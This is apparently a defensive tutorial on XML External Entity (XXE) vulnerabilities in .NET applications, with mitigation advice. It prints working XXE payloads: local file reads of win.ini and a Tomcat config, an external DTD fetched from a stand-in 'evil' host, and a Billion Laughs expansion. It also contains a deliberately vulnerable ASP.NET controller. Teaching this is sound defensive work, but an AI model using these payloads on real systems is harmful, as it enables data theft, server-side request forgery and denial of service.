OWASP TOP 4: Xml External Entities (XEE)

This is the fifth article in the OWASP Top 10 Series

Overview

At time of this writing Xml External Entities (XXE) is the number 4 risk of the OWASP Top 10. As in the rest of cases of this OWASP series, I´ll try to scope samples of this article to web applications developed under .NET technologies (ASP.NET MVC, ASP.NET WF, ASP.NET Core, WebAPI, WCF, EF, etc…) but same principles can also be applied to Java, PHP, Node JS, etc..,. XML External Entities risk is new from last revision of OWASP Top Ten (no present at 2013 review) and it´s placed at #4 by for own merits due to incredible prevalence within code. This type of attack occurs when an XML input containing a reference to one external entity is processed by weak XML parser, in other words when untrusted xml input is being processed and included by XML Parser. Let´s dive into XXE details

Xml External Entities – Impacts

One of the reasons why XXE is at number #4 is the multiple derived risks what it entails, without being exhaustive we can enumerate the following ones:

Data Disclosure
External Request
Denial of Service
Port Scanning
Server Side Request Forgery
Remote Code Execution

These ones usually fall into XXE Injection or XXE Expansion, as we will see in short. So really dangerous risk to be taken into consideration.

Xml External Entities Explained

In terms of Threat Agents, attacker will try to exploit vulnerable (or legacy) XML parsers by uploading XML documents with any versatile and hostile payload, or even by directly sending XML documents. The exploitability is classified as medium. From a general perspective, the prevalence is high within de code; this can be due to not only the lack of SASTs, DASTs or event IAST analysis. A simple SAST can detect the issue by inspecting dependencies and configuration. So far, this risk has not been tested properly. Detectability is currently classified as high, as we have commented is easy to detect by moderns ASTs. Technical Impact falls also into severe category, once a breach has been exploited multiple potential risks arises, as the ones detailed in the previous section, urging to take corrective actions as soon as possible.

From the OWASP document we see:

Xml Basics regarding XXE

In order to understand XXE properly we will review a few basics about XML. As every developer knowns, XML is a markup language that defines specific set of rules for encoding documents in a format that is both human-readable and machine-readable. Most part of success of XML format resides in its flexibility and also in the ability to define proper building blocks and entities some of them can be physically defined in a separate file with DTDs (Document Type Definitions).

XML is a markup language which basically means that content is separated from format instructions. Format instructions are semantic pieces coming from SGML (Standard Generalized Markup Language) and design of XML was done for being clear, easy to create and easy to processing by using XML parsers. From a general perspective:

Due to the fact that XML derives from SGML, XML also supports DTDs, which is an optional part of XML that describes a class of documents which contains markup declarations and providing specific grammar. According to Wikipedia: “A DTD defines the valid building blocks of an XML document. It defines the document structure with a list of validated elements and attributes. A DTD can be declared inline inside an XML document, or as an external reference

Source code

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- the XHTML document body starts here-->
<html xmlns="http://www.w3.org/1999/xhtml">
 ...
</html>

A DTD is linked to XML document by using a DOCTYPE declaration (as can be seen above) and can be provided in two fashions: as internal subset or external subset.

At DTD we can also define Entities, according to wiki : “An entity is similar to a macro. The entity declaration assigns it a value that is retained throughout the document. A common use is to have a name more recognizable than a numeric character reference for an unfamiliar character”,

Source code

<!DOCTYPE sgml [
  <!ELEMENT sgml ANY>
  <!ENTITY % std       "standard SGML">
  <!ENTITY % signature " — &author;.">
  <!ENTITY % question  "Why couldn’t I publish my books directly in standard SGML?">
  <!ENTITY % author    "William Shakespeare">
]>

So entities can be thought as placeholders for variables which can be

Regular Entities: for text substitution
Predefined Entities: &amp
External Entities: Which can point to internal and external resources (this is where things becomes dangerous)

Source code

<?xml version="1.0" encoding="utf-8"?>
 
<!DOCTYPE person [
<! ENTITY Surname "Surname" >
]>
 
<person>
	&Surname
</person>

The problem arises when parsers dereference these entities substituting the reference by the entity´s value.

Note: In this line there is a common misconception about XML validation; XML Validation is not in charge of validating when XML document has a valid instance of DTD or entities, it only validates whether the XML document is well-formedness

XXE Types

XXE occurs when untrusted input inside XML file is being processed and included into application process by an XML parser, which processes the XML file. Vulnerability arises when this untrusted input is at DTD or entities. At this point we can distinguish between two types of attacks: XML External Entity Injection and XML External Entity Expansion, let´s review each one in detail:

XML External Entity Injection (XXE Injection)

By using XXE Injection attackers will try to disclosure info from the server, trying to retrieve sensitive data like passwords, etc…. they will include malicious payload at DTDs by including internal resource request.

They also will try to perform external resource request in order create request to another servers from the one processing the parser. Inside this category attackers will also try to perform remote code execution.

Some examples of this kind of XXE vulnerability (which we will review in Asp.NET sample in detail) are:

Source code

<?xml version="1.0"?>
<!DOCTYPE funwithxxe [  
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]>
 < funwithxxe >&xxe;</ funwithxxe >

Source code

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
 <!ENTITY % start "<![CDATA[">
 <!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
%dtd;
]>
<root>&all;</root>

XML External Entity Expansion (XXE Expansion)

XXE Expansion is similar, but here attackers will try to deplete the server processing the XML file with all its resources. So attackers will try to include as much references as they can using common recursive entities techniques like de popular “billons laughs” or quadratic blowup.

Billion Laughs Attack

Source code

<?xml version="1.0"?>
<!DOCTYPE data [
	<!ENTITY a0 "dos" >
	<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
	<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
	<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
	<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
	]>
	<data>&a4;</data>

Let´s now see XEE in action by introducing a sample in detail:

XXE in Action: ASP.NET MVC Sample

After reviewing the basics of XXE, let´s show a little sample about ASP.NET MVC application which is XXE vulnerable by default:

Here we will create a dummy MVC structure by including a couple of views Details.cshtml, and XmlIndex.cshtml inside Xml folder and a very basic XmlController for enabling default XML-Parser to work:

This way:

Code for controller simple has method for loading de page (index) and do xml parsing action redirecting results to Details view, really simple:

Source code

public class XmlController : Controller
    {
        public XmlController() 
        {
        }
 
        public ActionResult LoadXml(string filename)
        {
            try
            {
                var dir = new System.IO.DirectoryInfo(Server.MapPath("~/App_Data/uploads/"));
                string sourcePath = Path.Combine(dir.FullName, filename);
 
                XmlDocument xmlDoc = new XmlDocument();
                xmlDoc.Load(sourcePath);
 
                ViewBag.Value = String.Format("Processed XML: {0} ", xmlDoc.InnerText);
                return View("Detail");
            }
            catch (Exception ex)
            {
                // more exception handling here if needed
                return HttpNotFound();
            }
        }
 
        public ActionResult XmlGeneral(string queryType, string fileName)
        {
            try
            {
                if (queryType == "Load")
                {
                    return Load(fileName);
                }
                else if (queryType == "LoadXml")
                {
                    return LoadXml(fileName);
                }
                else
                {
                    return HttpNotFound();
                }
            }
            catch (Exception ex)
            {
                return HttpNotFound();
            }
        }
    }

Code for XmlIndex.cshtml is also simple for running these actions, something similar to:

Source code

@{
    ViewBag.Title = "Xml ParserMethods Page : ";
}
 
@model List<string>
<h2>XPath Methods Page</h2>
 
 
<div style="margin-left:auto; margin-right: auto; ">
 
    <div class="col-md-12" style="border:solid;border-width:1px;padding-top:20px; padding-bottom:20px;">
        @using (Html.BeginForm("XmlGeneral", "Xml", FormMethod.Post, new { @class = "form-horizontal", role = "form" }))
            {
            @Html.ValidationSummary()
 
            <p style="font-size:16px; color:#7b8598;"><u><b>XmlDocument Class Section</b></u></p>
                <br />
                <div >
 
                    <div style="width:810px;padding-bottom:5px;">
                        <p style="width:50%;float:left;position:relative">
                            @Html.Label("FileName: ")
                            @Html.TextBox("FileName", "userscheme.xml" , new { @class = "form-control" })
                        </p>
                    </div>
 
                    <div style="padding-top:65px;padding-bottom:45px;">
                        <p style="float:left;">
                            <button type="submit" name="queryType" value="Load" class="btn btn-default">Run Load</button>
                            <button type="submit" name="queryType" value="LoadXml" class="btn btn-default">Run LoadXml</button>
                        </p>
                    </div>
 
                    <div style="background-color:ButtonFace ;font-size:12px; padding-top:20px;padding-bottom:10px;">
                        <ul>
                            <li><i><b>Add</b> This action invokes logic for running Vulnerable XmlDocument.Load method</i></li>
                            <li><i><b>AddByProperty</b> This action invokes logic for running Vulnerable XmlDocument.LoadXml method</i></li>
                        </ul>
                    </div>
 
                </div>
        }
 
    </div>
 
    </div>

Code for Details.cshtml view is trivial

Source code

@{
    string value = ViewBag.Value;
}
 
<div>
    <hr />
    <dl class="dl-horizontal">
        <h3><b>Value:</b>@value</h3>
</div>

Now that secondary actors have been presented it´s time to introduce the main one: userScheme.xml file, which in its more basic forms is something like:

Source code

<?xml version="1.0"?>
<!DOCTYPE person [
<!ENTITY surname "This is the surname file from entity definition">
]>
<UserScheme xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<person>
	&surname;
</person>
</UserScheme>

Let´s see what happens when processing this xml by our dummy XmlController:

Really dangerous ….as we can see the entity have been processed without any restriction by using default XmlDocument.Load() behaviour !

Let´s see what happens if we include some malicious directive at entities declarations, something like:

Source code

<?xml version="1.0"?>
<!DOCTYPE foo [  
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]>
 <foo>&xxe;</foo>

If we run the LoadXML action we obtain:

This constitutes a perfect disclosure data case. It´s clear that from here we will be able to perform more dangerous actions like get internal server info and send it to another attacker servers, or exploit the vulnerabilities to deplete the server by using XML booms, etc…

For those of you curious about potential malicious payloads you can visit (among others):

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection

XXE Risky Scenarios and General Recommendations

From a general perspective risky sceneries arises when:

You have code for processing XML data
When user defined DTDs are allowed as untrusted input for your parsers
Specific dereferencing entities process inside XML data processing

This way, general recommendations for code review are the following:

Review your XML parsers and check if you .NET framework version is from 4.5.2 onwards, if not chances are that your parsers will be vulnerable
Check if your XML input is sanitized before being processing
Check also if DTDs are allowed by your parsers and if so, check that allowed DTDs never belongs to untrusted part (no user defined DTD should be allowed). DTD´s are a valid mechanism but from security perspective, users never should be able to provide this info
Check if external entities are allowed
Limit the memory and resources for XML processing

Mitigating XXE

In addition to previously commented recommendations (which constitutes the first line of defence in depth), we are now to enumerate some general mitigation techniques that are focus into the heart of the XXE vulnerability: when xml parsers process user-provided DTDs and external entities.

So from there:

Deactivate DTD loading feature for your parsers whenever possible
Deactivate external entity loading feature whenever possible
Update XML parser libraries (modern xml libraries deactivate DTD and EE by default)
Some frameworks allows to only enable DTD and EE loading from specific sources

From .NET perspective if you use XPathNavigator, XMLReader or XMLDocument before version 4.5.2 then your code is vulnerable by default, in order words, DTDs and EE are allowed as untrusted input, so if this is the case recommended action will be to disable DTD in code, something similar to:

Source code

XmlDocument doc = new XmlDocument();
doc.XmlResolver = null;

There are, of course, other XML .NET components which are secure by default regardless framework version, these are the following ones:

LinqToXML components, XmlDictionaryReader, XmlNodeReader, XmlReader and XslCompiledTransform

Also, we can protect our .NET applications from XXE expansion by using the class XMLReaderSettings and defining the MaxCharactersInDocument property.

Improving defences

In order to improve (or even avoid) manual revision of your code, you can make use of a professional SAST for identifying where your vulnerabilities are placed and perform any corrective action. You can also implement even better solution by using tandem IAST (for detecting) plus RASP (for protecting) applications.